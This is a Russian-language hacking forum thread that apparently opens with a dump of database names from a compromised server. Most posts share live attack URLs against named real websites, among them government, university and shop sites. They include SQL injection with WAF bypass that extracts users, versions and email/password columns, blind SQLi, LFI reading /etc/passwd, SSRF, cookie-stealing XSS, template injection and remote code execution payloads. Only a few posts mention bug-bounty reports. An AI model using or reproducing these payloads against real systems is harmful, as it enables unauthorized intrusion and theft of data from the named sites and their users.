1poverennaya.ru
3dschool.akadem-art.ru
acmoda_fashion
akadem-art.ru
amsterdam.ru
amur-tiger
api.olit.su
apteki.ru
at
ayashiclimat
berendeevo
bitrix_55
cargoflies.ru
civlife
cookies
cpa
cpa-monsters.ru
crypto
cv79250_db
db1050525_rpfm
dev.check-car.io
dish.ru
docdoc
dojoy.ru
dreamwood
el-torg.ru
fefectu_fikcii
game4art.ru
gidrolica
greencontinent.bio
hockeyfamily
hostel
information_schema
informed
irasmarovoz
kordik-psyhelp
kz_health
lecture
led1080.ru
lesspas
light
lotmo
mailer
maxphoto
medelement.ru
messenger
metalnastil.ru
miel.ru
modelery
mototelega
mysql
nanokeratin-shop
new.olit.su
new_olit
newoleg
olit_su
olmatveeva.ru
pdns
performance_schema
photoluxor
picture
pineapple
powerdns
prazdnik
pressnastil.ru
profdoctors.ru
push
radio.ru
recraft.ru-yii
redmine
rekomendacii
remcraft.ru
remcraft.ru-new
remcraft.ru-new1!!
resthistory
rlogistika
seobirds
seorakerus
seowant.ru
sflegaladvice
siluet.su
sitemanager0
skld
social
sound_olit
sound_olit_su
sport
spz-rus.ru
stroynastil.ru
stroynastil.ru1
sveng
telegramm
test
umgear.ru
union.ru
union.ru-old
vault-pdm.ru
velespro.com
videoportal
visagestyle
water-check.ru
wawtalk.io
webmonsters
whoknow.ru
yandex_bot
yiilab
ymga.ru
ymga.ru-new
zabbix
zaem-info.ru
Franky_T
06.11.2018, 23:48
Здравствуйте)
На форуме первый день, попробую тоже.
1. SQL-инъекция с обходом WAF
GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414, 1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
Host: www.cdlmacapa.com.br
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
2. SQL-инъекция с выводом в ошибке
http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x 3a,(select+user()+limit+0,1)))
Franky_T
10.11.2018, 20:34
Еще немножко - теперь LFI.
http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774
https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&email=marketing@fcostabrava.com```
http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd
http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd
qwaszx000
07.01.2019, 15:46
https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20
rusty@localhost
5.5.62
bible_history
Егорыч+++
07.01.2019, 16:39
↑ (https://antichat.live/posts/4275483/)
https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20
rusty@localhost
5.5.62
bible_history
Все было бы хорошо, но оно гуглится и похоже этой баге года два уже.
XSS
https://www.pinpics.com/searchT.php?keyw=alert('test')
XSS
1) https://elkomp.ru/search?sought=alert('xss')
2) https://kubnews.ru/poisk/?q=alert('xss') (https://kubnews.ru/poisk/?q=%3Cscript%3Ealert(%27xss%27)%3C/script%3E)
3) http://ivgoradm.ru/find=alert('xss')
4) https://www.lapsi.ru/list.php?q=alert('xss')
5) http://brykury.com.ua/products/search?search=alert('xss')
BenderMR
03.03.2019, 12:38
SQLi:
SoftwareOnRent
http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5, 6,concat_ws(0x7c,database(),%20user(),version()),8 ,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27--+&catid=1&compid=135
SOR|SORuser@localhost|5.5.56-MariaDB
http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5, 6,group_concat(column_name),8,9,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27%20from%20informat ion_schema.columns%20where%20table_schema=database ()%20and%20table_name=%27users%27--+&catid=1&compid=135
[B]SecurityDealOnline
http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%2 0concat_ws(0x7c,database(),version()))))--+
bluewings|bluewings1@localhost|5.6.39-cll-lve
http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%2 0count(table_name)%20from%20information_schema.tab les%20where%20table_schema=database()%20)))--+
BrandTagz
http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,concat_ws(%27|%27,%20d atabase(),user(),version()),3,4,5,6,7,8,9,10,11--+&&product=Dress%20Shirts
http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,%20group_concat(concat _ws(':',email, password),0x0a),3,4,5,6,7,8,9,10,11%20from user--+&&product=Dress%20Shirts
BenderMR
08.03.2019, 11:58
Rcadia
http://www.rcadia.com/page.php?pageID=-23%20union%20select%2012,3,4,5,concat_ws(0x7c,user (),database(),version()),7,8,9,10,11,12,13,14,15,1 6,17,18,19
rcadia2@rogueriver.dreamhost.com (mailto:rcadia2@rogueriver.dreamhost.com)|rcadia2| 5.6.34-log
Городской совет, Черкассы
http://chmr.gov.ua/myrada/html/195784.php?id=-195784%20/*!50000uNioN*/%20select%20concat_ws(0x7c, database(),user(),version())--+
myrada|myrada@ns1|5.5.24-log
Индусо шоп
https://www.royalenterprises.co.in/category.php?cid=9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
myp13eyd_royal2|myp13eyd_royal2@localhost|5.6.32-78.1
https://www.royalenterprises.co.in/category.php?cid=-9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,1 6,17,18 from /*!50000infoRmAtiOn_sChEma*/.tables+/*!50000WhErE*/+/*!50000table_schema*/=database()--+#
way.com
https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
https://temp-mail.org/en/?email="/onfocus='alert`lul`'/autofocus="@tmailcloud.net
lifescore
04.09.2019, 14:21
rce (=
.SpoilerTarget" type="button">Spoiler: oops
шттп://www. (http://www.t)t| u | torialspoint.com/
http://tlgur.com/d/g2bZA9ag
Stat on similarweb =)
http://tlgur.com/d/g5k0xpL8
PoC
.SpoilerTarget" type="button">Spoiler: query with params
from base64
UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3 RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpD b250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdX JsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNv bQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbX BpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x
Pop-Xlop
08.11.2019, 15:12
ZoneAlarm
https://forums.zonealarm.com/ajax/render/widget_php
POST:
widgetConfig[code]=phpinfo();
Octavian
15.02.2020, 20:28
Blind XSS в админке Hostinger, простите за ру сайт
https://crm.hostinger.io/client/29640132
PS: Зарепортил сказали спасибо и продлили хостинг на один месяц
https://i.ibb.co/3dDdY3n/xsshunter-screenshot-4d85d71612ad33e7805775752555a58641d7b54b611913e560 bd95db4d692e82c5fdcf8c13f04c1fa115f3c46d91956de781 1f05e83ba7831767d94d37dee38a8473804264852d54be80b2 991e38b7c136f36876cc61458ecb943bcb0dd3399dae0bc5e4 .jpg
Octavian
25.03.2020, 19:50
Есть такой кардер который украл 36 милионов $ и отсидел 10 лет, сейчас у него канал на ютубе "Люди PRO", сам смотрю )
У него свой кэшбэк сервис в котором минут за 5 нашел Server side template injection, правда полезную нагрузку вывесть не смог (
https://secretdiscounter.com/ru/search/coupon?limit=30&query={{7*7}}.
+ XSS
https://secretdiscounter.com/ru/"//>alert(5) (https://secretdiscounter.com/ru/%22//%3E%3Cscript%3Ealert(5)%3C/script%3E)
General Inspectorate for Emergency Situations
Генеральная инспекция для чрезвычайных ситуаций
https://www.igsu.ro/index.php?pagina=materiale_preventive%3E%3Cscript% 3Ealert(666)%3C/script%3E
Promotora Española de Lingüística (Proel)
http://www.proel.org/index.php?sw=%3E%3Cscript%3Ealert%285%29%3C%2Fscri pt%3E&pagina=searchresult
Post-Reformation Digital Library (PRDL) - database that organizes the vast array of publicly available digital sources on the development of theology and philosophy during the early modern era (late 15th-18th c.). The PRDL spans collections from major research libraries, independent scholarly initiatives, and corporate documentation projects.
https://www.prdl.org/pub_name.php?p_name=%3Cscript%3Eprompt(%22xss%22)% 3C/script%3E
https://www.metaltorg.ru/metal_catalog/tsvetnyye_metally_splavy_prokat/dragotsennyye_metally/zoloto/?module=index%27%22()%26%25%3CScRiPt%20%3Eprompt(9 72295)%3C/ScRiPt%3E
University of Oxford
Faculty of Oriental Studies
XSS -
http://etcsl.orinst.ox.ac.uk/cgi-bin/etcsl.cgi?charenc=j&display=Crit&text=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2 Fscript%3E%3Cfont%3E
И снова учебное заведение в Великобритании
Macmillan Academy
XSS -
http://www.macmillan-academy.org.uk/search.php
В поле поиска вставляем - '"alert(1);
WallHack
06.05.2020, 11:28
SSRF
surfmaxxx.ru/system/web.php?u=file:///etc/passwd
XSS in
The European Genome-phenome Archive (EGA)
https://ega-archive.org/search-results.php?query=alert('1')
Lestatkiy
09.05.2020, 02:06
LFI
https://www.bridgeworld.com/indexphp.php?page=../../../../../etc/passwd
ERROR Based SQL injection
https://client-api.coronavirus-monitor.com/v1/city-comments?per-page=20&q[id_city][or]=1=1)%20union%20SELECT%20cast(concat(version())%20 as%20bigint)%20FROM%20information_schema.tables%20--+-
PENNSYLVANIA ASSOCIATION OF PRIVATE SCHOOL ADMINISTRATORS
https://papsa.org/search/results.php?s=%3Cscript%3Ealert(%271%27)%3C/script%3E
EPOMM is the European Platform on Mobility Management, a network of governments in European countries that are engaged in Mobility Management (MM)
XSS:
http://www.epomm.eu/index.php?country_id=21&id=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3 E
Lestatkiy
21.07.2020, 00:58
code executed
https://joemonster.org/search.php?q=dir%26dir
поле поиска под фильтрацией, но есть частичное исполнения комманд
dir&dir
ответ
Volume in drive H is Storage
Volume Serial Number is 20D8-07C3
Directory of H:\Gry
https://euacademics.com/country.php?id=">alert(1);
Octavian
15.03.2021, 15:11
Stored XSS на banggood
https://www.banggood.com/qa-question-1714302-1.html
The virtual community for English-speaking expats and Russians
https://www.expat.ru/culturereviews.php?cid=-211+union+select+1,2,3,version (),5,6,7,8,9,10,11--
Octavian
26.09.2021, 21:11
Получил такой отстук из сервисов Yandex
http://i.ibb.co/N21vkvs/photo-2021-09-26-20-04-43.jpg http://i.ibb.co/dQZvZ7y/photo-2021-09-26-20-04-36.jpg
erwerr2321
26.09.2021, 21:44
↑ (https://antichat.live/posts/4475715/)
Получил такой отстук из сервисов Yandex
ничёси, какая удача!
давно ли это случилось? и что сказали на ББ?
Octavian
26.09.2021, 22:00
↑ (https://antichat.live/posts/4475718/)
ничёси, какая удача!
давно ли это случилось? и что сказали на ББ?
Давно, без ответа по этому запостил.
Я в чате боту ответи XSS-кой
https://www.sportmaster.ru/catalog/product/search.do?text=lol%27-prompt(%27hek?%27)-%27&f-delivery=courier
https://thumbs.dfs.ivi.ru/storage9/contents/a/b/78a4a0ed16e16c38c75a92ffa15840.jpg?mod=
https://www.acer.com/ac/en/US/content/support-product/7603?b=1&pn=%3Cscript%3Ealert(/heck/);%3C/script%3E
https://job.detmir.ru/vacancies/?new-city=%3Csvg/onload=alert(document.domain)%3E
https://honda.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
https://dixy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
erwerr2321
21.10.2021, 22:26
↑ (https://antichat.live/posts/4475715/)
Получил такой отстук из сервисов Yandex
http://i.ibb.co/N21vkvs/photo-2021-09-26-20-04-43.jpg
http://i.ibb.co/dQZvZ7y/photo-2021-09-26-20-04-36.jpg
Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:
на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))
Но было ещё и третье место, откуда он постреливал.
И вот только вчера прилетело письмецо в конверте.
Octavian
24.10.2021, 21:41
↑ (https://antichat.live/posts/4478921/)
Это по сути песочница. Один пейлоад стрелял сразу в нескольких местах:
на ифраме-толока.ком и на sandbox.ифраме-толока.ком. Но там тоже ни кук, ни импэкта))
Но было ещё и третье место, откуда он постреливал.
И вот только вчера прилетело письмецо в конверте.
View attachment 14009 (https://antichat.live/attachments/14009.img)
А моя доля? На шаверму
erwerr2321
24.10.2021, 21:47
↑ (https://antichat.live/posts/4479295/)
А моя доля? На шаверму
Шта?
Я её намного раньше тебя запостил! я ж писал тебе tracking ID и time 1619951822533
Ни гани!
eminlayer7788
01.11.2021, 16:35
SQLi
.SpoilerTarget" type="button">Spoiler: link
https://www.goal.az/livescore/tourn...oin (select 6)f join (select 7)g /news/45011/ (https://www.goal.az/livescore/tournament/42%20and%200%20union%20select%20*%20from%20(select %20group_concat(user())%20from%20users)a%20join%20 (select%202)b%20join%20(select%203)c%20join%20(sel ect%204)d%20join%20(select%205)e%20join%20(select% 206)f%20join%20(select%207)g%20/news/45011/)
eminlayer7788
18.11.2021, 16:02
sql injection
.SpoilerTarget" type="button">Spoiler: sqli url
https://optimal.az/TV-Audio-Foto-Video/Oyun-ve-Eylence?page=2&price=1%27group%20by%20mid(user()%20from%20floor(r and(0)*2))having%20avg(0)--%20-
and how to get table & column names ?
thanks for help !
↑ (https://antichat.live/posts/4481871/)
sql injection
Spoiler: sqli url
https://optimal.az/TV-Audio-Foto-Video/Oyun-ve-Eylence?page=2&price=1
%27group%20by%20mid(user()%20from%20floor(rand(0)* 2))having%20avg(0)--%20-
and how to get table & column names ?
thanks for help !
digging blind sqli
*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'a%') AND '9'='9
*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'b%') AND '9'='9
...
*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'n%') AND '9'='9
*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 2) AND '9'='9
*mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 333) AND '9'='9
Octavian
19.02.2022, 15:57
Пришел мне лог на xsshunter с непонятного сайта, такой вот сайт который парсит но не обрабатывает вывод )
https://www.social-searcher.com/social-buzz/?q5=alert(document.cookie)
eminlayer7788
23.06.2022, 12:31
.SpoilerTarget" type="button">Spoiler: sqli
https://rezume.am/?filter_id[0]=5 a...ting_admins limit 1 offset 0*/))),false))--+- (https://rezume.am/?filter_id[0]=5%20and%20updatexml%28null,%28/*!50000concat*/%280x3a,0x7c,%28/*!40101%20seleCT*/%20/*!40101%20group_Concat%28database(),0x3a,%28versio n()%29%29*/%20from%20/**saaaaa**//*!40101%20joblisting_admins%20limit%201%20offset%2 00*/%29%29%29,false%29%29--+-)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot